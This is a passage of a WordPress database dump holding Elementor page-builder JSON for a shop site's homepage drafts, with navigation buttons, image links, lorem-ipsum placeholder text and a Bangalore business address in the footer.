here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8580,1498,'_elementor_page_assets','a:0:{}'),(8582,1499,'_elementor_edit_mode','builder'),(8583,1499,'_elementor_template_type','wp-page'),(8584,1499,'_elementor_version','3.7.7'),(8585,1499,'_wp_page_template','elementor_canvas'),(8586,1499,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8587,1499,'_elementor_page_assets','a:0:{}'),(8598,1501,'_elementor_edit_mode','builder'),(8599,1501,'_elementor_template_type','wp-page'),(8600,1501,'_elementor_version','3.7.7'),(8601,1501,'_wp_page_template','elementor_canvas'),(8602,1501,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\"